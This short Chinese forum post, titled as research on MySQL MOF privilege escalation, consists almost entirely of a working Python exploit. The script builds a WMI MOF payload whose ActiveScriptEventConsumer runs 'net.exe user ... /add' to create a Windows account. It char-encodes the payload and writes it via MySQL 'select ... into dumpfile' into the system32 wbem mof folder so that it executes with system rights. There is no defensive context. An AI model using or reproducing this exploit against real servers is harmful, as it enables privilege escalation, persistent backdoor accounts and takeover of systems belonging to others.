关于mysql mof提权研究
payload = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user xxxx xxx /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
'''
ascii_payload = ''
for each_chr in payload:
ascii_payload += str(ord(each_chr)) + ','
ascii_payload = ascii_payload[:-1]
cur = conn.cursor()
sql = "select char(%s) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'" % ascii_payload
cur.execute(sql)
页:
[1]